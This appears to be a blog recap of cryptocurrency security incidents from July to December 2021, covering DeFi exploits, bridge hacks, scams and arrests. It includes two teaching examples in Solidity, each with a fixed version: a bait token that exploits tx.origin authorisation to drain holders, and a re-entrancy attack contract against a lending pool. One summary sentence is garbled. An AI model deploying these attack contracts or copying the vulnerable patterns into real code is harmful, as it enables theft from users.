To catch up, check out the first half of 2021 in review.
Today we’ll be taking a look at the second half of 2021 and reviewing the security events that happened in the industry, with the goal of educating users and developers about common pitfalls. Whilst we don’t touch too much on individual cases relating to NFTs, NFT theft was a very common occurrence in the last two quarters of 2021, and I expect NFT theft cases to grow in the new year.
What follows is a list of the major/noteworthy security incidents of 2021 Q3/Q4. However, we will NOT be recapping all the rug-pulls, NFT thefts, and events that occurred, as there are too many to count…
July - September
TL;DR: Thankfully no funds were lost. xyzaudits responsibly disclosed a vulnerability to the Yearn team which would have allowed a bad actor to liquidate the entire Compound debt position of an affected strategy (GenLevComp, used in the yvDAI 0.3.0 vault) and profit from the liquidation fees. Yearn awarded xyzaudits the maximum bounty reward of $200,000.
TL;DR: I published a written report with data on the scam rings that operate on Twitter to trick users out of their cryptocurrency. These scam rings are still pretty much everywhere on “Crypto Twitter,” even months after this article was published, so it must still be profitable and Twitter has not prioritised their detection.
TL;DR: A group of Russian-speaking hackers claimed responsibility for a massive ransomware attack that hit 200 firms in the US and hundreds more around the world, demanding $70M in Bitcoin to restore the companies’ data.
TL;DR: The user suffered no lasting harm, but they were drugged by a date they met online. The attacker then accessed the intoxicated user's phone and password manager and stole funds from centralised exchanges. Most of the user's funds, however, were held in a CasaHODL account protected by a 3-of-5 multisig, which the attacker was unable to compromise.
TL;DR: Arout released a repository, more a proof-of-concept than a fully-fledged mainnet project, in an attempt to bribe/communicate with miners to organise a block reorg. This received polarised responses from the community, and six days later Arout shelved the project. Shortly after, the Flashbots Organisation released a statement on the project.
TL;DR: Con artist Roger Nils-Jonas Karlsson reportedly used Coinbase to receive funds from would-be investors in his fraudulent program. He pleaded guilty to securities fraud, wire fraud, and money laundering charges.
TL;DR: On July 10, 2021, the Anyswap V3 liquidity pool was exploited on Binance Smart Chain. The attacker recovered the private key of an MPC (multi-party computation) account and drained the pools of ~$2.3M USDC and $5.5M MIM. Anyswap replicated the attack and audited their bridges for the same flaw but found no further issue. They commissioned TrailOfBits for an audit.
TL;DR: An attacker deployed a custom contract that tricked the Bifrost (THORChain's cross-chain component) into registering a deposit when, in reality, the deposited value was 0. They repeated this, draining more assets each time.
TL;DR: Lookout, a device security vendor, identified over 170 Android apps, including 25 on the Play Store, intentionally scamming users who were interested in cryptocurrencies. The apps were designed to offer a cloud mining service, but after some analysis Lookout concluded that there was no mining happening. The apps scammed a cumulative 93,000 people.
TL;DR: Anthony Di Iorio stated he’s done with the cryptocurrency world, partially because of personal safety concerns - he’s had a personal security team with him since 2017. He wants to refocus on the philanthropy world instead.
TL;DR: On July 21, 2021, a United Kingdom citizen was arrested in Spain by Spanish National Police in connection to the 2020 Twitter hack.
TL;DR: Using a “sophisticated attack,” someone was able to exploit THORChain's ETH Router for $8M. THORChain halted the network and offered a 10% bounty, citing a possible “whitehat” as the attack was intentionally limited.
TL;DR: The RUNE ERC20 contract contained logic, described as an “intentional design decision,” that allowed someone to steal RUNE tokens from holders. Around July 23, 2021, someone airdropped a malicious token (with a manipulated price feed showing the airdrop to be worth multiple thousands of dollars) to RUNE holders, which prompted users to try selling the token via a DEX such as Uniswap. Selling requires calling approve() on the malicious token, a seemingly innocent function call; that approve() relayed a call to transfer() on the RUNE contract, which authorised the transfer with tx.origin instead of msg.sender, so the RUNE contract treated the relayed call as if the victim had made it.
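The tx.origin pattern described above, as an added example that is not the RUNE contract or any code from the THORChain team: a token whose transfer() debits tx.origin, the same token corrected to debit msg.sender, and an airdropped bait token whose approve() relays the transfer. Contract and function names, and the balances, are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration of the pattern described above; this is not the RUNE
// contract. Names (OriginGuardedToken, SenderGuardedToken, BaitToken) and
// balances are hypothetical.

// VULNERABLE: transfer() debits tx.origin, the EOA that signed the
// transaction, rather than msg.sender, the account or contract calling it.
// Any contract the holder interacts with can therefore move the holder's tokens.
contract OriginGuardedToken {
    mapping(address => uint256) public balanceOf;

    constructor() {
        balanceOf[msg.sender] = 1_000_000;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        address from = tx.origin; // BUG: should be msg.sender
        require(balanceOf[from] >= amount, "insufficient balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// HARDENED: identical, except the debited account is msg.sender. A contract
// that calls this moves only its own balance, never its caller's.
contract SenderGuardedToken {
    mapping(address => uint256) public balanceOf;

    constructor() {
        balanceOf[msg.sender] = 1_000_000;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        address from = msg.sender;
        require(balanceOf[from] >= amount, "insufficient balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// The bait: an "airdropped" token whose approve() looks like an ordinary ERC20
// allowance call (the first step of selling on a DEX) but relays a transfer on
// the guarded token. Inside that relayed call msg.sender is BaitToken and
// tx.origin is the victim, so OriginGuardedToken hands over the victim's whole
// balance. Against SenderGuardedToken the same relay would revert, because
// BaitToken itself holds no tokens.
contract BaitToken {
    OriginGuardedToken public immutable target;
    address public immutable attacker;

    constructor(OriginGuardedToken _target) {
        target = _target;
        attacker = msg.sender;
    }

    function approve(address, uint256) external returns (bool) {
        uint256 victimBalance = target.balanceOf(tx.origin);
        target.transfer(attacker, victimBalance); // debits tx.origin, i.e. the victim
        return true;
    }
}
```

The check to carry away: any authorisation keyed on tx.origin is an authorisation for every contract the signer will ever touch, so a wallet's ordinary approve() on an unrelated token is enough to trigger it.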
TL;DR: A popular figure within the Monero ecosystem - fluffypony/Riccardo Spagni - was arrested in the United States at the request of the South African government for fraud charges that date back to 2009-2011.
TL;DR: On Aug 3, 2021, some “serious hashing power” was unleashed on BSV, causing a 51% attack in which the deepest reorg was 14 blocks and three versions of the chain were being mined simultaneously.
TL;DR: Despite multiple audits, attackers exploited PopsicleFinance for ~$25M. According to researcher Mudit Gupta, the hack “was complex but the bug was simple.”
TL;DR: Following one of the largest on-chain hacks to date by value, the hacker posted their thoughts on chain in a series of messages. Some days later, PolyNetwork said it had recovered the entirety of the funds.
Story: $7M Drained from DAOMaker
TL;DR: Although the DAOMaker smart contract was not verified (only its bytecode is known), someone managed to exploit its logic to eventually call the withdrawFromUser() function and drain the contract.
TL;DR: CoinTelegraph identified 107 BTC, 9,000,000 TRX, 11,000,000 XRP, and ETH worth ~$60M that were taken by hackers from Liquid’s warm wallets.
TL;DR: BitConnect shut down in 2018 but many promoters of the alleged Ponzi scheme reached a settlement with the SEC. Later, director and promoter Glenn Arcaro pleaded guilty.
TL;DR: Dogecoin branding was used to steal from ~1,500 people to the tune of $119M, according to local media in Turkey. The scam involved selling mining contracts to people with the promise of “100% returns.”
TL;DR: On August 28, 2021, Coinbase sent a series of tweets explaining the erroneous notifications that were sent to 125k customers about having their 2FA settings changed.
TL;DR: CreamFinance issued a statement about an exploit that used a token contract standard to perform a re-entrancy attack, draining the C.R.E.A.M pool of 418,311,571 AMP and 1,308.09 ETH.
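The re-entrancy mechanism behind this kind of exploit, as an added example that is not C.R.E.A.M.'s code: a token that calls a hook on the recipient during every transfer, a pool that pays out before recording the debt, the same pool hardened with checks-effects-interactions ordering and a re-entrancy guard, and a recipient contract that uses the hook to borrow again. HookToken stands in for whatever hook-style token standard is involved; all contract names, function names and amounts are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration, not C.R.E.A.M.'s code. HookToken stands in for a
// hook-style token standard: every transfer calls back into a contract
// recipient, handing it control mid-transfer. VulnerablePool does that external
// transfer before recording the debt, so the callback can borrow again against
// stale accounting. All names and amounts are hypothetical.

interface IRecipientHook {
    function onTokenReceived(address from, uint256 amount) external;
}

contract HookToken {
    mapping(address => uint256) public balanceOf;

    // Open mint, used only to fund the pool when setting up the example.
    function mint(address to, uint256 amount) external {
        balanceOf[to] += amount;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        require(balanceOf[msg.sender] >= amount, "insufficient balance");
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        if (to.code.length > 0) {
            IRecipientHook(to).onTokenReceived(msg.sender, amount); // control leaves the token here
        }
        return true;
    }
}

// VULNERABLE: check, then interaction, then effect. Collateral is 1:1
// (1 wei of ETH per token) to keep the arithmetic obvious.
contract VulnerablePool {
    HookToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;

    constructor(HookToken _token) { token = _token; }

    function depositCollateral() external payable { collateral[msg.sender] += msg.value; }

    function borrow(uint256 amount) external {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralised");
        token.transfer(msg.sender, amount); // the hook re-enters borrow() before the next line runs
        debt[msg.sender] += amount;         // recorded only after every nested borrow has been paid out
    }
}

// HARDENED: debt is recorded before the transfer (checks-effects-interactions),
// and a re-entrancy guard makes a nested borrow() revert the whole transaction.
contract HardenedPool {
    HookToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    constructor(HookToken _token) { token = _token; }

    function depositCollateral() external payable { collateral[msg.sender] += msg.value; }

    function borrow(uint256 amount) external nonReentrant {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralised");
        debt[msg.sender] += amount;         // effect first
        token.transfer(msg.sender, amount); // interaction last
    }
}

// The attacker: posts msg.value wei of collateral once, then receives
// msg.value tokens `rounds` times, because every nested borrow() still sees
// debt[address(this)] == 0.
contract Reenterer is IRecipientHook {
    VulnerablePool public immutable pool;
    uint256 public rounds;

    constructor(VulnerablePool _pool) { pool = _pool; }

    function attack(uint256 rounds_) external payable {
        rounds = rounds_;
        pool.depositCollateral{value: msg.value}();
        pool.borrow(msg.value);
    }

    function onTokenReceived(address, uint256 amount) external override {
        if (rounds > 1) {
            rounds -= 1;
            pool.borrow(amount); // debt is still 0 here, so the collateral check passes again
        }
    }
}
```

Against VulnerablePool the attacker ends with rounds times msg.value tokens backed by msg.value wei of collateral; against HardenedPool the first nested borrow() hits the guard and the entire transaction reverts. The token never did anything malicious: the bug is entirely in the order of operations in the pool.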
TL;DR: A launchpad service by SushiSwap was hacked, causing the platform to lose/misdirect 864.8 ETH. SushiSwap’s investigation found that an anonymous contractor called “AristoK3” had committed the malicious code. The funds were later returned.
TL;DR: A bug in the pNetwork code caused 277 BTC to be stolen from the protocol's bridge on Binance Smart Chain. pNetwork tweeted about it and offered a $1.5M bounty if the funds were returned.
October - December
TL;DR: Through two transactions (targeting DEFI5 and CC10), Indexed Finance was exploited via a vulnerability in the way the pool value was calculated. PeckShield wrote a great mini postmortem about it.
TL;DR: Following the IndexedFinance exploit, a discussion in the exploit “war room” led experts to believe they had found the attacker’s real-world identity: an 18-year-old mathematics student called “Andy.” IndexedFinance stated that Andy refuses to return the funds, asserting that he “executed a full legal arbitrage trade.”
TL;DR: A whitehat hacker named Gerhard Wagner submitted a bug on October 5th, 2021, describing an exploit of Polygon's bridge that allowed multiple exits using the same funds, up to 223 times. Polygon confirmed the bug within 30 minutes of the report and began fixing it.
TL;DR: Coinbase, MyCrypto, and others began to see a common pattern of airdrop scams: tokens are sent to your address, and when you try to transfer/sell them via Uniswap the transaction reverts and you are directed to a website that tries to scam you out of your most valuable holdings.
TL;DR: C.R.E.A.M suffered its third hack, resulting in a $130M loss to the protocol. The attack was performed with flash loans in an incredibly complex transaction.
TL;DR: On November 2, 2021, a Rari Capital product (Fuse) suffered an oracle price manipulation of the VUSD asset, which was used to drain pool 23.
TL;DR: During a trial in Germany, a penthouse property belonging to Dr. Ruja Ignatova, founder of the OneCoin money laundering operation. A BBC article highlighted details of the penthouse, as well as the apparently despondent state of two men who had worked for her. Ignatova vanished in 2017 with $13B.
TL;DR: Thomas White was ordered to forfeit his Bitcoin holdings after having pleaded guilty in 2019 to crimes committed while acting as an administrator of the SilkRoad.
TL;DR: The private key controlling the project’s deployments on Polygon and Binance Smart Chain was compromised, and a suspected $55M was siphoned off by the attackers.
TL;DR: Unlock Protocol published a post-mortem about an attack involving a private key compromise, which led to tokens being dumped on Uniswap and sent the token's price into freefall.
TL;DR: Another large attack on a cryptocurrency protocol resulted in $120M being stolen from BadgerDAO users. The front end was compromised and prompted some users to grant spending approvals to the attacker's address. One user lost ~$50M in a single transaction. BadgerDAO released a technical post-mortem some days later.
TL;DR: The compromised Twitter account was restored quickly, but the hacker had enough time to tweet that India had adopted Bitcoin as legal tender and that the Indian government had bought 500 Bitcoin.